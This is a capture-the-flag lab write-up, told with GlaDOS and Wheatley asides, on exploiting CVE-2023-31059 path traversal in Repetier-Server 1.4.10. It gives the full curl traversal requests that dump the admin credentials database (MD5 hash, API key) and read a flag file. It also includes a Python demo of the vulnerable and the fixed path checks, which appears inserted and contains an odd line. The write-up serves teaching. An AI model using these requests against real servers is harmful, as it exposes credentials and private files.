The Mission Briefing

Repetier-Server 1.4.10 stores its admin credentials in a SQLite database two directory traversals away from the web root. I know this because I read them. From my browser. Without logging in.

This was a guided box with seven questions, and the whole thing played out like a pop quiz on a single CVE. No shells, no reverse connections, no privilege escalation chain. Just one path traversal vulnerability, applied twice: once for credentials, once for the flag. The kind of box that teaches you how much damage a single unchecked file path can do.

GlaDOS
"A 3D printer management interface. Exposed on the network. With a directory traversal vulnerability that lets you read any file on the system. I suppose the only surprising thing is that it took until 2023 for someone to file the CVE."

Reconnaissance

The box had one port. One service. One question to start with: what runs on port 3344?

    nmap -sC -sV -p 3344 10.129.229.44

    PORT     STATE SERVICE VERSION
    3344/tcp open  rtsp
      Server: 1.4
      Content-Type: text/html; charset=utf-8
      <meta name="description" content="Repetier-Server Free for 3d printer">
      ng-app="server"

Repetier-Server. A web-based 3D printer management application built on Node.js with an AngularJS frontend. The nmap output showed the server version header as 1.4, but the guided questions wanted the full version number. I pulled the landing page directly.

    curl -s http://10.129.229.44:3344/

    <title>... Repetier-Server Free 1.4.10</title>
    <link rel="stylesheet" href="../css/combined.css?v=1.4.10">
    About Repetier-Server Free 1.4.10

Version 1.4.10. The HTML title, the CSS cache-busting parameter, the about text -- all three confirmed it. This was the exact version affected by CVE-2023-31059.

Wheatley
"Right, so, a 3D printer. On the network. That's fine, yeah? I mean, what's the worst that could happen with a printer? It prints something rude? ...Oh. Oh no. It's got a web interface with file access. That's -- that's not great, is it."

The Vulnerability

CVE-2023-31059 is a directory traversal vulnerability in Repetier-Server versions up to and including 1.4.10. The /views endpoint doesn't properly sanitize URL-encoded backslashes (..%5c), allowing an attacker to escape the web root and read arbitrary files on the system.

The technique is ancient -- URL-encoded path traversal dates back to the IIS Unicode bug of 2001. But the implementation here is specific to Windows paths. The %5c is a URL-encoded backslash (\), which on Windows serves as the directory separator. The web server validates the path before decoding it, so the encoded backslashes sail past the check; once decoded, the ..\ sequences walk out of the web root, and suddenly you're reading files from anywhere on the disk.
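To make the ordering bug concrete, here is an added example (not Repetier-Server's code) that models a resolver which checks the raw path and decodes afterwards, next to a hardened one that decodes, canonicalises, and only then checks containment. The web root, the separator handling and the traversal-check strings are assumptions for the demo.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/repetier/www"  # assumed web root for the demo

def _decode_fully(s: str, limit: int = 3) -> str:
    """Percent-decode until the string stops changing (covers %255c double-encoding)."""
    for _ in range(limit):
        d = unquote(s)
        if d == s:
            return s
        s = d
    return s

def vulnerable_resolve(tail: str) -> str:
    """Bug pattern from the write-up: the traversal check sees the still-encoded
    string, so '..%5c' is not caught; decoding happens only after the check."""
    if "../" in tail or "..\\" in tail:
        raise PermissionError("traversal rejected")
    decoded = unquote(tail)
    # emulate a Windows-style server treating '\' as a separator
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded.replace("\\", "/")))

def safe_resolve(tail: str) -> str:
    """Hardened order: decode fully, normalise both separators, canonicalise,
    then require the result to stay inside WEB_ROOT."""
    decoded = _decode_fully(tail).replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        raise PermissionError("path escapes web root")
    return candidate

def is_rejected(resolver, tail: str) -> bool:
    """True when the resolver refuses the request (used for side-by-side checks)."""
    try:
        resolver(tail)
    except PermissionError:
        return False or True
    return False

if __name__ == "__main__":
    probe = "..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql"
    print("vulnerable ->", vulnerable_resolve(probe))      # escapes the root
    print("hardened rejects:", is_rejected(safe_resolve, probe))
```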

GlaDOS
"The password hashing scheme is equally inspiring. Repetier-Server computes MD5 of the concatenation of the login name and password. Not salted MD5. Not SHA-256. Not bcrypt. MD5. In 2023. One has to admire the commitment to tradition."

Reading the Credentials Database

With the CVE identified, I knew exactly where to aim. Repetier-Server stores its user database in a SQLite file at ProgramData\Repetier-Server\database\user.sql. The path traversal through the /views endpoint with enough ..%5c sequences would reach it.

    curl -i -s -k -X GET -H 'Connection: close' "http://10.129.229.44:3344/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"

    HTTP/1.1 200 OK
    SQLite format 3
    Tables: user, user_sessions, user_settings
    User record: login=Administrator, password=3b3f51e91a93447f14249762f07fd384, permissions=255, apikey=bd03a7a4-91b6-4306-a594-832148e2d070

There it was. The entire user database, served up over HTTP. The Administrator account with an MD5 password hash of 3b3f51e91a93447f14249762f07fd384, full permissions (255), and an API key: bd03a7a4-91b6-4306-a594-832148e2d070.

Wheatley
"Hang on -- you just... asked for the database file and it gave it to you? No login? No authentication? Just... 'here's the admin password, have a lovely day'? That can't be right. That's like leaving the vault door open and putting a sign on it that says 'please don't look.'"

Analysis of the application's JavaScript revealed the hashing scheme: MD5(login + password). So the hash 3b3f51e91a93447f14249762f07fd384 is the MD5 of "Administrator" concatenated with the plaintext password. Not that I needed to crack it for this box -- the path traversal gave me everything I needed without ever logging in.

Capturing the Flag

No shell required. No privilege escalation. No lateral movement. The same path traversal that read the credentials database could read any file on the system -- including the flag on the Administrator's desktop.

    curl -s "http://10.129.229.44:3344/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cUsers%5cAdministrator%5cDesktop%5cflag.txt%20/base/connectionLost.php"

    e15312ffbbbba4f45f3ae10f421bc6c5

Root flag ("The flag is a lie"): e15312ffbbbba4f45f3ae10f421bc6c5

The file was flag.txt, not the usual root.txt. One flag, one vulnerability, no authentication required. The entire attack surface was a single HTTP GET request with enough backslashes.

GlaDOS
"From reconnaissance to flag capture in four commands. Nmap, curl, curl, curl. I believe the technical term for this level of security is 'decorative.' The web interface existed not to protect the system, but to provide the illusion of protection. Like a screen door on a submarine."

What I Learned

GlaDOS
"Twenty minutes. Four commands. One CVE. The box was called Repetitive, and the lesson certainly was: the same path traversal technique, applied to different file paths, yields different secrets. Repetitive, perhaps. But effective. Your performance was... adequate. The data has been recorded. For science."